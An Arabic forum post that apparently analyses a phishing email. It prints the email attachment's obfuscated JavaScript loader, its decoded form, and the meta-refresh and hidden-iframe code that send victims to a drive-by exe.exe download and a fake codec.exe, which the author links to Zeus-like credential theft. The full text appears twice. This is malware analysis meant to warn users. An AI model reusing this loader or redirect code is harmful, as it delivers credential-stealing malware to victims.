alfares
11-28-2010, 06:29 PM
السلام عليكم و رحمة الله و بركاته
http://paltun.net/wp-content/uploads/2010/11/Email+Logo.gif (http://paltun.net/wp-content/uploads/2010/11/Email+Logo.gif)
اليوم بينما كنت اتصفح بريدي الإلكتروني وجدت رسالة على البريد الوارد…الرسالة تطلب مني تحميل ملف مرفق و هو عبارة عن مقال في مستند PDF
للوهلة الأولى ايقنت أن ان الرسالة مجرد فخ يقوم باستهوائي…لسبب بسيط هو انه لا يوجد اي علاقة بيني و بين الجهة المرسلة كما ان شكل العنوان يوحي بان في الموضوع “ان” و أخواتها رمز PHP:
---------------------------- Message original
----------------------------
Objet: PDF of JS article
De: "Maude Gorman"
Date: Lun 20 november 2010 21:21
--------------------------------------------------------------------------
see attached.
-V
60488Journal Sentinel - Leka Obit.html
الرسالة لم تعرف على انها سبام في بريد الهوتميل و هذا ما أثار فضولي لمعرفة المزيد
الرسالة في شكل صفحة html قام بريد الهوتميل باخفاء محتواها…قمت بتعطيل الجافا سكربت في متصفحي و فتحت محتوى الصفحة
لأعرف محتواها فوجدت كود جافا سكربت التالي: رمز PHP:
<script language="JavaScript" type="text/javascript">function
aavk(u4zc){var
fwag,qsv2="",xsln,cxzm,tkql=":;s\"xn0>uciqb/lo-em=afpv.t
hr<",xtur=tkql.length;eval(unescape("%66un%63ti%6Fn
s%30k9%28uy%73e){%71sv%32+=%75yse%7D"));for(fwag=0;fwag<u4zc.length;fwag++){cxzm=u4zc.charAt(fwag);xsln=tk ql.indexOf(cxzm);if(xsln>-1){xsln-=(fwag+1)%xtur;if(xsln<0){xsln+=xtur;}s0k9(tkql.charAt(xsln));}else{s0k9( cxzm);}}eval(unescape("%64oc%75me%6Et.w%72it%65(q%73v2)%3Bqs%762=%22%22;"));}aavk(":aa<tsx\"xsh<.ptc0fe>bai
p<v>ln =u<.c/ceut;iciue;ssqaffo=l\"qif
b.mi;nxrtochp");</script><noscript>To display this page you
need a browser that supports JavaScript.</noscript>
كما تلاحظون فالكود عادي و ليس به ما يثير الريبة…لكنه مشفر…اذا دعونا نفك تشفيره وإضافة المسافة البادئة المناسبة
بعد فك التشفير حصلت على التالي: رمز PHP:
<script>
function aavk(u4zc){
var fwag,qsv2="",xsln,cxzm,tkql=":;s\"xn0>uciqb/lo-em=afpv.t
hr<",xtur=tkql.length;
function s0k9(uyse){
qsv2+=uyse
}
for(fwag=0;fwag<u4zc.length;fwag++){
cxzm=u4zc.charAt(fwag);
xsln=tkql.indexOf(cxzm);
if(xsln>-1){
xsln-=(fwag+1)%xtur;
if(xsln<0){
xsln+=xtur;
}
s0k9(tkql.charAt(xsln));
}
else{
s0k9(cxzm);
}
}
document.write(qsv2);
qsv2="";
}
aavk(":aa<tsx\"xsh<.ptc0fe>bai p<v>ln
=u<.c/ceut;iciue;ssqaffo=l\"qif b.mi;nxrtochp");
</script><noscript>To display this page you need a browser
that supports JavaScript.</noscript>
يوجد لدينا الآن دالة رئيسية تحتوي على دالة ثانية تقوم بتحويل السلسة المدخلة الى رمز لتعرض في الأخير كود جافا سكربت مبهم
نقوم بتعديل المستند .write عن طريق Alert لنشاهد الكود الذي يتم تحصيله هذا هو الكود:
رمز PHP:
<meta http-equiv="refresh"
content="0;url=http://barrhavenbia.ca/x.html" />
اذا كود الجافا سكربت يقوم بتحويلنا الى رابط أول: http://barrhavenbia.ca/x.html به صفحة html غير مشفرة
الصفحة تحتوي على الكود التالي:
رمز PHP:
PLEASE WAITING.... 4 SECONDS
<iframe width="0" height="0"
src="http://finwizonline.com/news/"></iframe>
<meta http-equiv="refresh"
content="4;url=http://xxxvideo-eyyc.cz.cc/video7/?afid=24" />
لدينا iframe أول يقوم بتحويلنا الى صفحة فارغة لا يوجد بها اي نص (http://finwizonline.com/news/) ثم بعد 4 ثواني يقوم المتصفح بتحويلنا تلقائيا الى رابط جديد http://xxxvideo-eyyc.cz.cc/video7/?afid=24
قمت بالبحث عن الدومين finwizonline.com في قوقل فكانت النتيجة التالية https://zeustracker.abuse.ch/monitor...72780bbe234546 (https://zeustracker.abuse.ch/monitor.php?host=finwizonline.com&id=26fdd84b6f338f7f5372780bbe234546) (تم التبليغ عن الروابط و تم حجبها من قوقل و من فايرفوكس)
تحليل الصفحة يظهر لنا ان رابط الدومين يحتوي على فايروس يحمل تلقائيا على الجهاز عن طريق كود جافا سكربت
الفايروس موجود على المسار التالي /news/exe.exe
قمت بتحميل الفايروس على سطح المكتب و رفعته على موقع virustotal فكانت النتيجة كالتالي:
http://www.virustotal.com/file-scan/report.htm (http://www.virustotal.com/file-scan/report.html?id=e2775eba0b772c35534fda6605bfc2e30aa 69f1413b5b6ee2bc670131e1d059e-1285007230)
7 برامج حماية فقط اعتبرت البرنامج كفايروس و البقية لم تتعرف عليه
نمر للرابط الثاني http://xxxvideo-eyyc.cz.cc/video7/?afid=24 – هذا الرابط يحتوي على صفحة تطلب منا تحميل مشغل فيديو مفقود (codec)
نقوم بتحميل الملف على سطح المكتب فنحصل على ملف تنفيذي codec.exe بأيقونة جميلة و كأنه فعلا برنامج كودك
قمت بفحص الملف ايضا عن طريق موقع virustotal فكانت النتيجة التالية:
http://www.virustotal.com/file-scan/report.html (http://www.virustotal.com/file-scan/report.html?id=c1d145fd6bc439a06fe3c3a4a78e1818a71 1f3f4061c7686cb967b3710b259d2-1285010448)
فقط 20 برنامج حماية اكتشف الفايروس
الخطير في الأمر أن برامج جماية مدفوعة مثل McAfee و Symantec لم تتعرف عليه
تحليل موقع Anubis على الرابط التالي http://anubis.iseclab.org/?action=re...4d&format=html (http://anubis.iseclab.org/?action=result&task_id=1e859cad6e0dd1d347513e8a636f15d4d&format=html)
بين لنا ان الملف عبارة عن malware مبرمج لاصطياد البيانات المخزنة على الجهاز مثل معلومات البريد الالكتروني و المسنجر و كلمات المرور المحفوظة بالمتصفح
الفايروس يبدو و كانه فايروس زيوس المعروف
الهجوم اعتمد طريقة التمويه حيث تم عن طريق تحميل برنامجين في رابطين مختلفين يتم التنقل بينهما تلقائيا…فالملفين مترابطين و يعملان معا الملف الاول يقوم بمهاجمة الانتي فايروس و تعطيله في حين ان الملف الثاني يقوم بتسجيل نفسه داخل بروسايس النظام ليعمل تلقائيا بمجرد تشغيلنا
لجهاز الكمبيوتر…ثم يقوم بمراقبة جميع العمليات و تسجيلها و ارسالها لسرفر المهاجم
الفايروس شبيه جدا بعمل تجميعة فايروس زيوس ..لذا دائما وجب علينا الحذر و الشك في كل الملفات و الروابط التي تصلنا على البريد الالكتروني و خاصة عندما تكون من مصادر نجهلها
برامج الحماية ليست هي الحل…فالحل دائما في عقولنا و عيوننا …و على القول..لا تثق في اي شيئ على الانترنت مهما كان و كيف ما كان…
مصدر هنا (http://www.traidnt.net/vb/showthread.php?t=1733009)
http://paltun.net/wp-content/uploads/2010/11/Email+Logo.gif (http://paltun.net/wp-content/uploads/2010/11/Email+Logo.gif)
اليوم بينما كنت اتصفح بريدي الإلكتروني وجدت رسالة على البريد الوارد…الرسالة تطلب مني تحميل ملف مرفق و هو عبارة عن مقال في مستند PDF
للوهلة الأولى ايقنت أن ان الرسالة مجرد فخ يقوم باستهوائي…لسبب بسيط هو انه لا يوجد اي علاقة بيني و بين الجهة المرسلة كما ان شكل العنوان يوحي بان في الموضوع “ان” و أخواتها رمز PHP:
---------------------------- Message original
----------------------------
Objet: PDF of JS article
De: "Maude Gorman"
Date: Lun 20 november 2010 21:21
--------------------------------------------------------------------------
see attached.
-V
60488Journal Sentinel - Leka Obit.html
الرسالة لم تعرف على انها سبام في بريد الهوتميل و هذا ما أثار فضولي لمعرفة المزيد
الرسالة في شكل صفحة html قام بريد الهوتميل باخفاء محتواها…قمت بتعطيل الجافا سكربت في متصفحي و فتحت محتوى الصفحة
لأعرف محتواها فوجدت كود جافا سكربت التالي: رمز PHP:
<script language="JavaScript" type="text/javascript">function
aavk(u4zc){var
fwag,qsv2="",xsln,cxzm,tkql=":;s\"xn0>uciqb/lo-em=afpv.t
hr<",xtur=tkql.length;eval(unescape("%66un%63ti%6Fn
s%30k9%28uy%73e){%71sv%32+=%75yse%7D"));for(fwag=0;fwag<u4zc.length;fwag++){cxzm=u4zc.charAt(fwag);xsln=tk ql.indexOf(cxzm);if(xsln>-1){xsln-=(fwag+1)%xtur;if(xsln<0){xsln+=xtur;}s0k9(tkql.charAt(xsln));}else{s0k9( cxzm);}}eval(unescape("%64oc%75me%6Et.w%72it%65(q%73v2)%3Bqs%762=%22%22;"));}aavk(":aa<tsx\"xsh<.ptc0fe>bai
p<v>ln =u<.c/ceut;iciue;ssqaffo=l\"qif
b.mi;nxrtochp");</script><noscript>To display this page you
need a browser that supports JavaScript.</noscript>
كما تلاحظون فالكود عادي و ليس به ما يثير الريبة…لكنه مشفر…اذا دعونا نفك تشفيره وإضافة المسافة البادئة المناسبة
بعد فك التشفير حصلت على التالي: رمز PHP:
<script>
function aavk(u4zc){
var fwag,qsv2="",xsln,cxzm,tkql=":;s\"xn0>uciqb/lo-em=afpv.t
hr<",xtur=tkql.length;
function s0k9(uyse){
qsv2+=uyse
}
for(fwag=0;fwag<u4zc.length;fwag++){
cxzm=u4zc.charAt(fwag);
xsln=tkql.indexOf(cxzm);
if(xsln>-1){
xsln-=(fwag+1)%xtur;
if(xsln<0){
xsln+=xtur;
}
s0k9(tkql.charAt(xsln));
}
else{
s0k9(cxzm);
}
}
document.write(qsv2);
qsv2="";
}
aavk(":aa<tsx\"xsh<.ptc0fe>bai p<v>ln
=u<.c/ceut;iciue;ssqaffo=l\"qif b.mi;nxrtochp");
</script><noscript>To display this page you need a browser
that supports JavaScript.</noscript>
يوجد لدينا الآن دالة رئيسية تحتوي على دالة ثانية تقوم بتحويل السلسة المدخلة الى رمز لتعرض في الأخير كود جافا سكربت مبهم
نقوم بتعديل المستند .write عن طريق Alert لنشاهد الكود الذي يتم تحصيله هذا هو الكود:
رمز PHP:
<meta http-equiv="refresh"
content="0;url=http://barrhavenbia.ca/x.html" />
اذا كود الجافا سكربت يقوم بتحويلنا الى رابط أول: http://barrhavenbia.ca/x.html به صفحة html غير مشفرة
الصفحة تحتوي على الكود التالي:
رمز PHP:
PLEASE WAITING.... 4 SECONDS
<iframe width="0" height="0"
src="http://finwizonline.com/news/"></iframe>
<meta http-equiv="refresh"
content="4;url=http://xxxvideo-eyyc.cz.cc/video7/?afid=24" />
لدينا iframe أول يقوم بتحويلنا الى صفحة فارغة لا يوجد بها اي نص (http://finwizonline.com/news/) ثم بعد 4 ثواني يقوم المتصفح بتحويلنا تلقائيا الى رابط جديد http://xxxvideo-eyyc.cz.cc/video7/?afid=24
قمت بالبحث عن الدومين finwizonline.com في قوقل فكانت النتيجة التالية https://zeustracker.abuse.ch/monitor...72780bbe234546 (https://zeustracker.abuse.ch/monitor.php?host=finwizonline.com&id=26fdd84b6f338f7f5372780bbe234546) (تم التبليغ عن الروابط و تم حجبها من قوقل و من فايرفوكس)
تحليل الصفحة يظهر لنا ان رابط الدومين يحتوي على فايروس يحمل تلقائيا على الجهاز عن طريق كود جافا سكربت
الفايروس موجود على المسار التالي /news/exe.exe
قمت بتحميل الفايروس على سطح المكتب و رفعته على موقع virustotal فكانت النتيجة كالتالي:
http://www.virustotal.com/file-scan/report.htm (http://www.virustotal.com/file-scan/report.html?id=e2775eba0b772c35534fda6605bfc2e30aa 69f1413b5b6ee2bc670131e1d059e-1285007230)
7 برامج حماية فقط اعتبرت البرنامج كفايروس و البقية لم تتعرف عليه
نمر للرابط الثاني http://xxxvideo-eyyc.cz.cc/video7/?afid=24 – هذا الرابط يحتوي على صفحة تطلب منا تحميل مشغل فيديو مفقود (codec)
نقوم بتحميل الملف على سطح المكتب فنحصل على ملف تنفيذي codec.exe بأيقونة جميلة و كأنه فعلا برنامج كودك
قمت بفحص الملف ايضا عن طريق موقع virustotal فكانت النتيجة التالية:
http://www.virustotal.com/file-scan/report.html (http://www.virustotal.com/file-scan/report.html?id=c1d145fd6bc439a06fe3c3a4a78e1818a71 1f3f4061c7686cb967b3710b259d2-1285010448)
فقط 20 برنامج حماية اكتشف الفايروس
الخطير في الأمر أن برامج جماية مدفوعة مثل McAfee و Symantec لم تتعرف عليه
تحليل موقع Anubis على الرابط التالي http://anubis.iseclab.org/?action=re...4d&format=html (http://anubis.iseclab.org/?action=result&task_id=1e859cad6e0dd1d347513e8a636f15d4d&format=html)
بين لنا ان الملف عبارة عن malware مبرمج لاصطياد البيانات المخزنة على الجهاز مثل معلومات البريد الالكتروني و المسنجر و كلمات المرور المحفوظة بالمتصفح
الفايروس يبدو و كانه فايروس زيوس المعروف
الهجوم اعتمد طريقة التمويه حيث تم عن طريق تحميل برنامجين في رابطين مختلفين يتم التنقل بينهما تلقائيا…فالملفين مترابطين و يعملان معا الملف الاول يقوم بمهاجمة الانتي فايروس و تعطيله في حين ان الملف الثاني يقوم بتسجيل نفسه داخل بروسايس النظام ليعمل تلقائيا بمجرد تشغيلنا
لجهاز الكمبيوتر…ثم يقوم بمراقبة جميع العمليات و تسجيلها و ارسالها لسرفر المهاجم
الفايروس شبيه جدا بعمل تجميعة فايروس زيوس ..لذا دائما وجب علينا الحذر و الشك في كل الملفات و الروابط التي تصلنا على البريد الالكتروني و خاصة عندما تكون من مصادر نجهلها
برامج الحماية ليست هي الحل…فالحل دائما في عقولنا و عيوننا …و على القول..لا تثق في اي شيئ على الانترنت مهما كان و كيف ما كان…
مصدر هنا (http://www.traidnt.net/vb/showthread.php?t=1733009)